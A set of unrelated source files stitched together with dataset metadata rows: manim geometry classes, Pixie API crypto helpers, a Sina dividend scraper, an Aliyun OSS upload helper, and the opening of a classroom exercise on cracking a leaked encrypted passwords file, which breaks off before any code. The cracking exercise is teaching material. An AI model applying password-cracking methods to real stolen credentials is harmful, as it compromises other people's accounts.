line = Line(arc1.get_end(), arc2.get_start())
len_ratio = line.get_length() / arc1.get_arc_length()
if math.isnan(len_ratio) or math.isinf(len_ratio):
continue
line.insert_n_curves(int(arc1.get_num_curves() * len_ratio))
self.append_points(line.get_points())
class Triangle(RegularPolygon):
"""An equilateral triangle.
Parameters
----------
kwargs : Any
Additional arguments to be passed to :class:`RegularPolygon`
Examples
--------
.. manim:: TriangleExample
:save_last_frame:
class TriangleExample(Scene):
def construct(self):
triangle_1 = Triangle()
triangle_2 = Triangle().scale(2).rotate(60*DEGREES)
tri_group = Group(triangle_1, triangle_2).arrange(buff=1)
self.add(tri_group)
"""
def __init__(self, **kwargs):
super().__init__(n=3, **kwargs)
class Rectangle(Polygon):
"""A quadrilateral with two sets of parallel sides.
Parameters
----------
color : :class:`~.Colors`, optional
The color of the rectangle.
height : :class:`float`, optional
The vertical height of the rectangle.
width : :class:`float`, optional
The horizontal width of the rectangle.
grid_xstep : :class:`float`, optional
Space between vertical grid lines.
grid_ystep : :class:`float`, optional
Space between horizontal grid lines.
mark_paths_closed : :class:`bool`, optional
No purpose.
close_new_points : :class:`bool`, optional
No purpose.
kwargs : Any
Additional arguments to be passed to :class:`Polygon`
Examples
----------
.. manim:: RectangleExample
:save_last_frame:
class RectangleExample(Scene):
def construct(self):
rect1 = Rectangle(width=4.0, height=2.0, grid_xstep=1.0, grid_ystep=0.5)
rect2 = Rectangle(width=1.0, height=4.0)
rects = Group(rect1,rect2).arrange(buff=1)
self.add(rects)
"""
def __init__(
self,
color: Color = WHITE,
height: float = 2.0,
width: float = 4.0,
grid_xstep: Optional[float] = None,
grid_ystep: Optional[float] = None,
mark_paths_closed=True,
close_new_points=True,
**kwargs,
):
super().__init__(UR, UL, DL, DR, color=color, **kwargs)
self.stretch_to_fit_width(width)
self.stretch_to_fit_height(height)
v = self.get_vertices()
if grid_xstep is not None:
grid_xstep = abs(grid_xstep)
count = int(width / grid_xstep)
grid = VGroup(
*[
Line(
v[1] + i * grid_xstep * RIGHT,
v[1] + i * grid_xstep * RIGHT + height * DOWN,
color=color,
)
for i in range(1, count)
]
)
self.add(grid)
if grid_ystep is not None:
grid_ystep = abs(grid_ystep)
count = int(height / grid_ystep)
grid = VGroup(
*[
Line(
v[1] + i * grid_ystep * DOWN,
v[1] + i * grid_ystep * DOWN + width * RIGHT,
color=color,
)
for i in range(1, count)
]
)
self.add(grid)
class Square(Rectangle):
"""A rectangle with equal side lengths.
Parameters
----------
side_length : :class:`float`, optional
The length of the sides of the square.
kwargs : Any
Additional arguments to be passed to :class:`Square`
Examples
--------
.. manim:: SquareExample
:save_last_frame:
class SquareExample(Scene):
def construct(self):
square_1 = Square(side_length=2.0).shift(DOWN)
square_2 = Square(side_length=1.0).next_to(square_1, direction=UP)
square_3 = Square(side_length=0.5).next_to(square_2, direction=UP)
self.add(square_1, square_2, square_3)
"""
def __init__(self, side_length=2.0, **kwargs):
self.side_length = side_length
super().__init__(height=side_length, width=side_length, **kwargs)
class RoundedRectangle(Rectangle):
"""A rectangle with rounded corners.
Parameters
----------
corner_radius : :class:`float`, optional
The curvature of the corners of the rectangle.
kwargs : Any
Additional arguments to be passed to :class:`Rectangle`
Examples
--------
.. manim:: RoundedRectangleExample
:save_last_frame:
class RoundedRectangleExample(Scene):
def construct(self):
rect_1 = RoundedRectangle(corner_radius=0.5)
rect_2 = RoundedRectangle(corner_radius=1.5, height=4.0, width=4.0)
rect_group = Group(rect_1, rect_2).arrange(buff=1)
self.add(rect_group)
"""
def __init__(self, corner_radius=0.5, **kwargs):
self.corner_radius = corner_radius
super().__init__(**kwargs)
self.round_corners(self.corner_radius)
class ArrowTip(VMobject, metaclass=ConvertToOpenGL):
r"""Base class for arrow tips.
See Also
--------
:class:`ArrowTriangleTip`
:class:`ArrowTriangleFilledTip`
:class:`ArrowCircleTip`
:class:`ArrowCircleFilledTip`
:class:`ArrowSquareTip`
:class:`ArrowSquareFilledTip`
Examples
--------
Cannot be used directly, only intended for inheritance::
>>> tip = ArrowTip()
Traceback (most recent call last):
...
NotImplementedError: Has to be implemented in inheriting subclasses.
Instead, use one of the pre-defined ones, or make
a custom one like this:
.. manim:: CustomTipExample
>>> class MyCustomArrowTip(ArrowTip, RegularPolygon):
... def __init__(self, length=0.35, **kwargs):
... RegularPolygon.__init__(self, n=5, **kwargs)
... self.width = length
... self.stretch_to_fit_height(length)
>>> arr = Arrow(np.array([-2, -2, 0]), np.array([2, 2, 0]),
... tip_shape=MyCustomArrowTip)
>>> isinstance(arr.tip, RegularPolygon)
True
>>> from manim import Scene
>>> class CustomTipExample(Scene):
... def construct(self):
... self.play(Create(arr))
Using a class inherited from :class:`ArrowTip` to get a non-filled
tip is a shorthand to manually specifying the arrow tip style as follows::
>>> arrow = Arrow(np.array([0, 0, 0]), np.array([1, 1, 0]),
... tip_style={'fill_opacity': 0, 'stroke_width': 3})
The following example illustrates the usage of all of the predefined
arrow tips.
.. manim:: ArrowTipsShowcase
:save_last_frame:
from manim.mobject.geometry import ArrowTriangleTip, ArrowSquareTip, ArrowSquareFilledTip,\
ArrowCircleTip, ArrowCircleFilledTip
class ArrowTipsShowcase(Scene):
def construct(self):
a00 = Arrow(start=[-2, 3, 0], end=[2, 3, 0], color=YELLOW)
a11 = Arrow(start=[-2, 2, 0], end=[2, 2, 0], tip_shape=ArrowTriangleTip)
a12 = Arrow(start=[-2, 1, 0], end=[2, 1, 0])
a21 = Arrow(start=[-2, 0, 0], end=[2, 0, 0], tip_shape=ArrowSquareTip)
a22 = Arrow([-2, -1, 0], [2, -1, 0], tip_shape=ArrowSquareFilledTip)
a31 = Arrow([-2, -2, 0], [2, -2, 0], tip_shape=ArrowCircleTip)
a32 = Arrow([-2, -3, 0], [2, -3, 0], tip_shape=ArrowCircleFilledTip)
b11 = a11.copy().scale(0.5, scale_tips=True).next_to(a11, RIGHT)
b12 = a12.copy().scale(0.5, scale_tips=True).next_to(a12, RIGHT)
b21 = a21.copy().scale(0.5, scale_tips=True).next_to(a21, RIGHT)
self.add(a00, a11, a12, a21, a22, a31, a32, b11, b12, b21)
"""
def __init__(self, *args, **kwargs):
raise NotImplementedError("Has to be implemented in inheriting subclasses.")
@property
def base(self):
r"""The base point of the arrow tip.
This is the point connecting to the arrow line.
Examples
--------
::
>>> arrow = Arrow(np.array([0, 0, 0]), np.array([2, 0, 0]), buff=0)
>>> arrow.tip.base.round(2) + 0. # add 0. to avoid negative 0 in output
array([1.65, 0. , 0. ])
"""
return self.point_from_proportion(0.5)
@property
def tip_point(self):
r"""The tip point of the arrow tip.
Examples
--------
::
>>> arrow = Arrow(np.array([0, 0, 0]), np.array([2, 0, 0]), buff=0)
>>> arrow.tip.tip_point.round(2) + 0.
array([2., 0., 0.])
"""
return self.get_points()[0]
@property
def vector(self):
r"""The vector pointing from the base point to the tip point.
Examples
--------
::
>>> arrow = Arrow(np.array([0, 0, 0]), np.array([2, 2, 0]), buff=0)
>>> arrow.tip.vector.round(2) + 0.
array([0.25, 0.25, 0. ])
"""
return self.tip_point - self.base
@property
def tip_angle(self):
r"""The angle of the arrow tip.
Examples
--------
::
>>> arrow = Arrow(np.array([0, 0, 0]), np.array([1, 1, 0]), buff=0)
>>> round(arrow.tip.tip_angle, 5) == round(PI/4, 5)
True
"""
return angle_of_vector(self.vector)
@property
def length(self):
r"""The length of the arrow tip.
Examples
--------
::
>>> arrow = Arrow(np.array([0, 0, 0]), np.array([1, 2, 0]))
>>> round(arrow.tip.length, 3)
0.35
"""
return np.linalg.norm(self.vector)
class ArrowTriangleTip(ArrowTip, Triangle):
r"""Triangular arrow tip."""
def __init__(
self,
fill_opacity=0,
stroke_width=3,
length=DEFAULT_ARROW_TIP_LENGTH,
start_angle=PI,
**kwargs,
):
Triangle.__init__(
self,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
start_angle=start_angle,
**kwargs,
)
self.width = length
self.stretch_to_fit_height(length)
class ArrowTriangleFilledTip(ArrowTriangleTip):
r"""Triangular arrow tip with filled tip.
This is the default arrow tip shape.
"""
def __init__(self, fill_opacity=1, stroke_width=0, **kwargs):
super().__init__(fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs)
class ArrowCircleTip(ArrowTip, Circle):
r"""Circular arrow tip."""
def __init__(
self,
fill_opacity=0,
stroke_width=3,
length=DEFAULT_ARROW_TIP_LENGTH,
start_angle=PI,
**kwargs,
):
self.start_angle = start_angle
Circle.__init__(
self, fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs
)
self.width = length
self.stretch_to_fit_height(length)
class ArrowCircleFilledTip(ArrowCircleTip):
r"""Circular arrow tip with filled tip."""
def __init__(self, fill_opacity=1, stroke_width=0, **kwargs):
super().__init__(fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs)
class ArrowSquareTip(ArrowTip, Square):
r"""Square arrow tip."""
def __init__(
self,
fill_opacity=0,
stroke_width=3,
length=DEFAULT_ARROW_TIP_LENGTH,
start_angle=PI,
**kwargs,
):
self.start_angle = start_angle
Square.__init__(
self,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
side_length=length,
**kwargs,
)
self.width = length
self.stretch_to_fit_height(length)
class ArrowSquareFilledTip(ArrowSquareTip):
r"""Square arrow tip with filled tip."""
def __init__(self, fill_opacity=1, stroke_width=0, **kwargs):
super().__init__(fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs)
class Cutout(VMobject, metaclass=ConvertToOpenGL):
"""A shape with smaller cutouts.
.. warning::
Technically, this class behaves similar to a symmetric difference: if
parts of the ``mobjects`` are not located within the ``main_shape``,
these parts will be added to the resulting :class:`~.VMobject`.
Parameters
----------
main_shape : :class:`~.VMobject`
The primary shape from which cutouts are made.
mobjects : :class:`~.VMobject`
The smaller shapes which are to be cut out of the ``main_shape``.
kwargs
Further keyword arguments that are passed to the constructor of
:class:`~.VMobject`.
Examples
--------
.. manim:: CutoutExample
class CutoutExample(Scene):
def construct(self):
s1 = Square().scale(2.5)
s2 = Triangle().shift(DOWN + RIGHT).scale(0.5)
s3 = Square().shift(UP + RIGHT).scale(0.5)
s4 = RegularPolygon(5).shift(DOWN + LEFT).scale(0.5)
s5 = RegularPolygon(6).shift(UP + LEFT).scale(0.5)
c = Cutout(s1, s2, s3, s4, s5, fill_opacity=1, color=BLUE, stroke_color=RED)
self.play(Write(c), run_time=4)
self.wait()
"""
def __init__(self, main_shape, *mobjects, **kwargs):
super().__init__(**kwargs)
self.append_points(main_shape.get_points())
if main_shape.get_direction() == "CW":
sub_direction = "CCW"
else:
sub_direction = "CW"
for mobject in mobjects:
self.append_points(mobject.force_direction(sub_direction).get_points())
class Angle(VMobject, metaclass=ConvertToOpenGL):
"""A circular arc or elbow-type mobject representing an angle of two lines.
Parameters
----------
line1 :
The first line.
line2 :
The second line.
radius :
The radius of the :class:`Arc`.
quadrant : Sequence[:class:`int`]
A sequence of two :class:`int` numbers determining which of the 4 quadrants should be used.
The first value indicates whether to anchor the arc on the first line closer to the end point (1)
or start point (-1), and the second value functions similarly for the
end (1) or start (-1) of the second line.
Possibilities: (1,1), (-1,1), (1,-1), (-1,-1).
other_angle :
Toggles between the two possible angles defined by two points and an arc center. If set to
False (default), the arc will always go counterclockwise from the point on line1 until
the point on line2 is reached. If set to True, the angle will go clockwise from line1 to line2.
dot : :class:`bool`
Allows for a :class:`Dot` in the arc. Mainly used as an convention to indicate a right angle.
The dot can be customized in the next three parameters.
dot_radius : :class:`float`
The radius of the :class:`Dot`. If not specified otherwise, this radius will be 1/10 of the arc radius.
dot_distance : :class:`float`
Relative distance from the center to the arc: 0 puts the dot in the center and 1 on the arc itself.
dot_color : :class:`~.Colors`
The color of the :class:`Dot`.
elbow : :class:`bool`
Produces an elbow-type mobject indicating a right angle, see :class:`RightAngle` for more information
and a shorthand.
**kwargs
Further keyword arguments that are passed to the constructor of :class:`Arc` or :class:`Elbow`.
Examples
--------
The first example shows some right angles with a dot in the middle while the second example shows
all 8 possible angles defined by two lines.
.. manim:: RightArcAngleExample
:save_last_frame:
class RightArcAngleExample(Scene):
def construct(self):
line1 = Line( LEFT, RIGHT )
line2 = Line( DOWN, UP )
rightarcangles = [
Angle(line1, line2, dot=True),
Angle(line1, line2, radius=0.4, quadrant=(1,-1), dot=True, other_angle=True),
Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, dot=True, dot_color=YELLOW, dot_radius=0.04, other_angle=True),
Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, dot=True, dot_color=GREEN, dot_radius=0.08),
]
plots = VGroup()
for angle in rightarcangles:
plot=VGroup(line1.copy(),line2.copy(), angle)
plots.add(plot)
plots.arrange(buff=1.5)
self.add(plots)
.. manim:: AngleExample
:save_last_frame:
class AngleExample(Scene):
def construct(self):
line1 = Line( LEFT + (1/3) * UP, RIGHT + (1/3) * DOWN )
line2 = Line( DOWN + (1/3) * RIGHT, UP + (1/3) * LEFT )
angles = [
Angle(line1, line2),
Angle(line1, line2, radius=0.4, quadrant=(1,-1), other_angle=True),
Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, other_angle=True),
Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED),
Angle(line1, line2, other_angle=True),
Angle(line1, line2, radius=0.4, quadrant=(1,-1)),
Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8),
Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, other_angle=True),
]
plots = VGroup()
for angle in angles:
plot=VGroup(line1.copy(),line2.copy(), angle)
plots.add(VGroup(plot,SurroundingRectangle(plot, buff=0.3)))
plots.arrange_in_grid(rows=2,buff=1)
self.add(plots)
.. manim:: FilledAngle
:save_last_frame:
class FilledAngle(Scene):
def construct(self):
l1 = Line(ORIGIN, 2 * UP + RIGHT).set_color(GREEN)
l2 = (
Line(ORIGIN, 2 * UP + RIGHT)
.set_color(GREEN)
.rotate(-20 * DEGREES, about_point=ORIGIN)
)
norm = l1.get_length()
a1 = Angle(l1, l2, other_angle=True, radius=norm - 0.5).set_color(GREEN)
a2 = Angle(l1, l2, other_angle=True, radius=norm).set_color(GREEN)
q1 = a1.get_points() # save all coordinates of points of angle a1
q2 = a2.reverse_direction().get_points() # save all coordinates of points of angle a1 (in reversed direction)
pnts = np.concatenate([q1, q2, q1[0].reshape(1, 3)]) # adds points and ensures that path starts and ends at same point
mfill = VMobject().set_color(ORANGE)
mfill.set_points_as_corners(pnts).set_fill(GREEN, opacity=1)
self.add(l1, l2)
self.add(mfill)
"""
def __init__(
self,
line1: Line,
line2: Line,
radius: float = None,
quadrant=(1, 1),
other_angle: bool = False,
dot=False,
dot_radius=None,
dot_distance=0.55,
dot_color=WHITE,
elbow=False,
**kwargs,
):
super().__init__(**kwargs)
self.quadrant = quadrant
self.dot_distance = dot_distance
self.elbow = elbow
inter = line_intersection(
[line1.get_start(), line1.get_end()], [line2.get_start(), line2.get_end()]
)
if radius is None:
if quadrant[0] == 1:
dist_1 = np.linalg.norm(line1.get_end() - inter)
else:
dist_1 = np.linalg.norm(line1.get_start() - inter)
if quadrant[1] == 1:
dist_2 = np.linalg.norm(line2.get_end() - inter)
else:
dist_2 = np.linalg.norm(line2.get_start() - inter)
if np.minimum(dist_1, dist_2) < 0.6:
radius = (2 / 3) * np.minimum(dist_1, dist_2)
else:
radius = 0.4
else:
self.radius = radius
anchor_angle_1 = inter + quadrant[0] * radius * line1.get_unit_vector()
anchor_angle_2 = inter + quadrant[1] * radius * line2.get_unit_vector()
if elbow:
anchor_middle = (
inter
+ quadrant[0] * radius * line1.get_unit_vector()
+ quadrant[1] * radius * line2.get_unit_vector()
)
angle_mobject = Elbow(**kwargs)
angle_mobject.set_points_as_corners(
[anchor_angle_1, anchor_middle, anchor_angle_2]
)
else:
angle_1 = angle_of_vector(anchor_angle_1 - inter)
angle_2 = angle_of_vector(anchor_angle_2 - inter)
if not other_angle:
start_angle = angle_1
if angle_2 > angle_1:
angle_fin = angle_2 - angle_1
else:
angle_fin = 2 * np.pi - (angle_1 - angle_2)
else:
start_angle = angle_1
if angle_2 < angle_1:
angle_fin = -angle_1 + angle_2
else:
angle_fin = -2 * np.pi + (angle_2 - angle_1)
angle_mobject = Arc(
radius=radius,
angle=angle_fin,
start_angle=start_angle,
arc_center=inter,
**kwargs,
)
if dot:
if dot_radius is None:
dot_radius = radius / 10
else:
self.dot_radius = dot_radius
right_dot = Dot(ORIGIN, radius=dot_radius, color=dot_color)
dot_anchor = (
inter
+ (angle_mobject.get_center() - inter)
/ np.linalg.norm(angle_mobject.get_center() - inter)
* radius
* dot_distance
)
right_dot.move_to(dot_anchor)
self.add(right_dot)
self.set_points(angle_mobject.get_points())
class RightAngle(Angle):
"""An elbow-type mobject representing a right angle between two lines.
Parameters
----------
line1 : :class:`Line`
The first line.
line2 : :class:`Line`
The second line.
length : :class:`float`
The length of the arms.
**kwargs
Further keyword arguments that are passed to the constructor of :class:`Angle`.
Examples
--------
.. manim:: RightAngleExample
:save_last_frame:
class RightAngleExample(Scene):
def construct(self):
line1 = Line( LEFT, RIGHT )
line2 = Line( DOWN, UP )
rightangles = [
RightAngle(line1, line2),
RightAngle(line1, line2, length=0.4, quadrant=(1,-1)),
RightAngle(line1, line2, length=0.5, quadrant=(-1,1), stroke_width=8),
RightAngle(line1, line2, length=0.7, quadrant=(-1,-1), color=RED),
]
plots = VGroup()
for rightangle in rightangles:
plot=VGroup(line1.copy(),line2.copy(), rightangle)
plots.add(plot)
plots.arrange(buff=1.5)
self.add(plots)
"""
def __init__(self, line1, line2, length=None, **kwargs):
super().__init__(line1, line2, radius=length, elbow=True, **kwargs)
| 32.707865
| 148
| 0.565997
|
4a07b3da1e3175e195466aa9e2b4a84af426d6e7
| 2,094
|
py
|
Python
|
src/api/python/pxapi/utils.py
|
hangqiu/pixie
|
1dd4af47d40ff856c4d52a1d6de81f78a76ff31e
|
[
"Apache-2.0"
] | 1,821
|
2020-04-08T00:45:27.000Z
|
2021-09-01T14:56:25.000Z
|
src/api/python/pxapi/utils.py
|
hangqiu/pixie
|
1dd4af47d40ff856c4d52a1d6de81f78a76ff31e
|
[
"Apache-2.0"
] | 142
|
2020-04-09T06:23:46.000Z
|
2021-08-24T06:02:12.000Z
|
src/api/python/pxapi/utils.py
|
hangqiu/pixie
|
1dd4af47d40ff856c4d52a1d6de81f78a76ff31e
|
[
"Apache-2.0"
] | 105
|
2021-09-08T10:26:50.000Z
|
2022-03-29T09:13:36.000Z
|
# Copyright 2018- The Pixie Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import uuid
from authlib.jose import JsonWebKey, RSAKey, JsonWebEncryption
from src.api.proto.uuidpb import uuid_pb2 as uuidpb
from src.api.proto.vizierpb import vizierapi_pb2 as vpb
def uuid_pb_from_string(id_str: str) -> uuidpb.UUID:
u = uuid.UUID(id_str)
return uuidpb.UUID(
high_bits=(u.int >> 64),
low_bits=(u.int & 2**64 - 1),
)
def uuid_pb_to_string(pb: uuidpb.UUID) -> str:
i = (pb.high_bits << 64) + pb.low_bits
u = uuid.UUID(int=i)
return str(u)
class CryptoOptions:
def __init__(self):
rsa = RSAKey.generate_key(key_size=4096, is_private=True)
self.jwk_public_key = JsonWebKey.import_key(rsa.as_pem(is_private=False))
self.jwk_private_key = JsonWebKey.import_key(rsa.as_pem(is_private=True))
self._key_alg = 'RSA-OAEP-256'
self._content_alg = 'A256GCM'
self._compression_alg = 'DEF'
def encrypt_options(self) -> vpb.ExecuteScriptRequest.EncryptionOptions:
return vpb.ExecuteScriptRequest.EncryptionOptions(
jwk_key=self.jwk_public_key.as_json(),
key_alg=self._key_alg,
content_alg=self._content_alg,
compression_alg=self._compression_alg,
)
def decode_row_batch(crypt: CryptoOptions, data) -> vpb.RowBatchData:
jwe = JsonWebEncryption()
rb = vpb.RowBatchData()
data = jwe.deserialize_compact(data, crypt.jwk_private_key)
rb.ParseFromString(data['payload'])
return rb
| 32.71875
| 81
| 0.708691
|
4a07b46b70027acb016053375d1c103fc1cf1a20
| 2,537
|
py
|
Python
|
stock/tushare_ShareBonus.py
|
vyouzhis/energy
|
c9c9b0c7dc2e85a093fb531f80c3aa6f458e8b6e
|
[
"Apache-2.0"
] | null | null | null |
stock/tushare_ShareBonus.py
|
vyouzhis/energy
|
c9c9b0c7dc2e85a093fb531f80c3aa6f458e8b6e
|
[
"Apache-2.0"
] | null | null | null |
stock/tushare_ShareBonus.py
|
vyouzhis/energy
|
c9c9b0c7dc2e85a093fb531f80c3aa6f458e8b6e
|
[
"Apache-2.0"
] | 1
|
2019-07-19T03:03:43.000Z
|
2019-07-19T03:03:43.000Z
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# mongo_data
#
# use mongodb pyalgotrade and sz50
#
# vim:fileencoding=utf-8:sw=4:et -*- coding: utf-8 -*-
import json
import sys
import pandas as pd
import lxml.html
from lxml import etree
from pandas.compat import StringIO
import _index
from energy.db.emongo import emongo
from energy.db.dblist import dblist
try:
from urllib.request import urlopen, Request
except ImportError:
from urllib2 import urlopen, Request
def _get_ShareBonus_data(code):
"""
获取沪深上市公司分红内容
Parameters
---------
code:string 代码
Return
-------
DataFrame
date,分红时间
bonus,送股(股)
tran,转增(股)
divid,派息(税前)(元)(每10股)
progress,进度
gxdate,除权除息日
regdate,股权登记日
"""
url = "http://money.finance.sina.com.cn/corp/go.php/vISSUE_ShareBonus/stockid/%s.phtml"%(code)
try:
request = Request(url)
text = urlopen(request, timeout=10).read()
text = text.decode('GBK')
text = text.replace('--', '')
html = lxml.html.parse(StringIO(text))
res = html.xpath("//table[@id='sharebonus_1']")
sarr = [etree.tostring(node) for node in res]
sarr = ''.join(sarr)
df = pd.read_html(sarr)[0]
CASHFLOW_COLS=['date','bonus','tran','divid','progress','gxdate','regdate','i','j','k','u']
df.columns = CASHFLOW_COLS
df.pop('u')
df.pop('i')
df.pop('j')
df.pop('k')
return df
except Exception as e:
print(e)
def getAllShareBonus():
dbl = dblist()
allCodeList = dbl.getAllCodeList()
dbl.Close()
emg = emongo()
conn = emg.getCollectionNames("ShareBonus")
conn.remove()
for post in allCodeList:
code = post["code"]
df = _get_ShareBonus_data(code)
cjson = df.to_json(orient="records")
j = json.loads(cjson)
dt = {}
dt[str(code)] = j
conn.insert(dt)
emg.Close()
def main():
if len(sys.argv) == 2:
stock = sys.argv[1]
print "get one stock:",stock
emg = emongo()
conn = emg.getCollectionNames("ShareBonus")
df = _get_ShareBonus_data(stock)
cjson = df.to_json(orient="records")
j = json.loads(cjson)
dt = {}
dt[str(stock)] = j
conn.insert(dt)
emg.Close()
else:
print "get all stock"
getAllShareBonus()
if __name__ == "__main__":
main()
| 22.855856
| 99
| 0.558928
|
4a07b5f44c91cfdddf1e5d87905a7ef961658a62
| 3,290
|
py
|
Python
|
python/sqlflow_submitter/pai/utils.py
|
MATRIX4284/sqlflow
|
eba7efd0d23c26c9c7f93526faddeba24ea3274f
|
[
"Apache-2.0"
] | 1
|
2019-12-24T01:38:17.000Z
|
2019-12-24T01:38:17.000Z
|
python/sqlflow_submitter/pai/utils.py
|
MATRIX4284/sqlflow
|
eba7efd0d23c26c9c7f93526faddeba24ea3274f
|
[
"Apache-2.0"
] | null | null | null |
python/sqlflow_submitter/pai/utils.py
|
MATRIX4284/sqlflow
|
eba7efd0d23c26c9c7f93526faddeba24ea3274f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The SQLFlow Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import oss2
import os
import uuid
from contextlib import contextmanager
oss_internal_endpoints = {
# From https://help.aliyun.com/document_detail/31837.html?spm=a2c4g.11186623.2.20.3eba7f5eufj1Pt#concept-zt4-cvy-5db
"oss-ap-northeast-1.aliyuncs.com": "oss-ap-northeast-1-internal.aliyuncs.com",
"oss-ap-south-1.aliyuncs.com": "oss-ap-south-1-internal.aliyuncs.com",
"oss-ap-southeast-1.aliyuncs.com": "oss-ap-southeast-1-internal.aliyuncs.com",
"oss-ap-southeast-2.aliyuncs.com": "oss-ap-southeast-2-internal.aliyuncs.com",
"oss-ap-southeast-3.aliyuncs.com": "oss-ap-southeast-3-internal.aliyuncs.com",
"oss-ap-southeast-5.aliyuncs.com": "oss-ap-southeast-5-internal.aliyuncs.com",
"oss-cn-beijing.aliyuncs.com": "oss-cn-beijing-internal.aliyuncs.com",
"oss-cn-chengdu.aliyuncs.com": "oss-cn-chengdu-internal.aliyuncs.com",
"oss-cn-hangzhou.aliyuncs.com": "oss-cn-hangzhou-internal.aliyuncs.com",
"oss-cn-hongkong.aliyuncs.com": "oss-cn-hongkong-internal.aliyuncs.com",
"oss-cn-huhehaote.aliyuncs.com": "oss-cn-huhehaote-internal.aliyuncs.com",
"oss-cn-qingdao.aliyuncs.com": "oss-cn-qingdao-internal.aliyuncs.com",
"oss-cn-shanghai.aliyuncs.com": "oss-cn-shanghai-internal.aliyuncs.com",
"oss-cn-shenzhen.aliyuncs.com": "oss-cn-shenzhen-internal.aliyuncs.com",
"oss-cn-zhangjiakou.aliyuncs.com": "oss-cn-zhangjiakou-internal.aliyuncs.com",
"oss-eu-central-1.aliyuncs.com": "oss-eu-central-1-internal.aliyuncs.com",
"oss-eu-west-1.aliyuncs.com": "oss-eu-west-1-internal.aliyuncs.com",
"oss-me-east-1.aliyuncs.com": "oss-me-east-1-internal.aliyuncs.com",
"oss-us-east-1.aliyuncs.com": "oss-us-east-1-internal.aliyuncs.com",
"oss-us-west-1.aliyuncs.com": "oss-us-west-1-internal.aliyuncs.com",
}
@contextmanager
def oss_temporary(ak, sk, endpoint, filename):
'''
oss_temporary copies `filename` to a temporary object on OSS and deletes it a.s.a.p.
Example:
with oss_temporary(YOUR_AK, YOUR_SK, ENDPOINT, 'test.py') as f:
do_something_with(f)
'''
bucket_name = 'sqlflow-pai-submitter'
auth = oss2.Auth(ak, sk)
bucket = oss2.Bucket(auth, endpoint, bucket_name)
bucket.create_bucket(oss2.BUCKET_ACL_PRIVATE, oss2.models.BucketCreateConfig(oss2.BUCKET_STORAGE_CLASS_IA))
name = uuid.uuid4().hex
if bucket.object_exists(name):
raise FileExistsError("[Errno 17] File exists: '%s'" % name) # This would never happen.
else:
bucket.put_object_from_file(name, filename)
yield f'oss://{bucket_name}.{internal_endpoints[endpoint]}/{name}'
bucket.delete_object(name)
| 51.40625
| 123
| 0.712462
|
4a07b7478e174cdc3445431af833137e81ea847f
| 958
|
py
|
Python
|
fHandleConnectionToServerTerminated.py
|
SkyLined/HTTP
|
f4e895508494dc007acd3ad011465a174e12ad88
|
[
"CC-BY-4.0"
] | 2
|
2020-06-25T03:51:05.000Z
|
2021-01-30T07:27:08.000Z
|
fHandleConnectionToServerTerminated.py
|
SkyLined/HTTP
|
f4e895508494dc007acd3ad011465a174e12ad88
|
[
"CC-BY-4.0"
] | null | null | null |
fHandleConnectionToServerTerminated.py
|
SkyLined/HTTP
|
f4e895508494dc007acd3ad011465a174e12ad88
|
[
"CC-BY-4.0"
] | null | null | null |
from mConsole import oConsole;
from mColorsAndChars import *;
from mCP437 import fsCP437FromBytesString;
from mNotProvided import *;
def fHandleConnectionToServerTerminated(oClient, oConnection, sbHostnameOrIPAddress):
# We only show this message if the user provided a hostname instead of an IP address.
sHostnameOrIPAddress = fsCP437FromBytesString(sbHostnameOrIPAddress);
(sRemoteIPAddress, uRemotePortNumber) = oConnection.txRemoteAddress[:2];
oConsole.fOutput(
COLOR_ACTIVE, "C",
COLOR_DISCONNECT, "-×→",
COLOR_ACTIVE, "S",
COLOR_NORMAL, " Connection to server ",
COLOR_INFO, ("[%s]" if ":" in sHostnameOrIPAddress else "%s") % sHostnameOrIPAddress,
COLOR_NORMAL, ":",
COLOR_INFO, str(uRemotePortNumber),
[
COLOR_NORMAL, " using IP address ",
COLOR_INFO, sRemoteIPAddress,
] if sHostnameOrIPAddress.lower() != sRemoteIPAddress.lower() else [],
COLOR_NORMAL, " terminated.",
);
| 36.846154
| 89
| 0.723382
|
4a07b773ec3db9836ede919159be18ee26791d32
| 7,209
|
py
|
Python
|
Cryptography/3.Password Cracking/passDriver.py
|
swethapraba/SeniorYearCSElectives
|
67b989ffecd5cf7508258783b0ec26468cdf94fc
|
[
"CNRI-Python"
] | null | null | null |
Cryptography/3.Password Cracking/passDriver.py
|
swethapraba/SeniorYearCSElectives
|
67b989ffecd5cf7508258783b0ec26468cdf94fc
|
[
"CNRI-Python"
] | null | null | null |
Cryptography/3.Password Cracking/passDriver.py
|
swethapraba/SeniorYearCSElectives
|
67b989ffecd5cf7508258783b0ec26468cdf94fc
|
[
"CNRI-Python"
] | null | null | null |
#issues: it's not actually finding a match :( so the decryption matrix never gets set right :(
"""
Assignment: Instructions from Blackboard
You have breached security in the TJ syslab and acquired the passwords.txt file for the class of 2018. The format of the file is
userid encPwd
where encPwd is an encryption of their password. You know that encPwd is always between 8-12 characters, the
allowed alphabet is 61 characters long, beginning with ASC(33)=0 and ending with ASC(93)=60. You believe the passwords
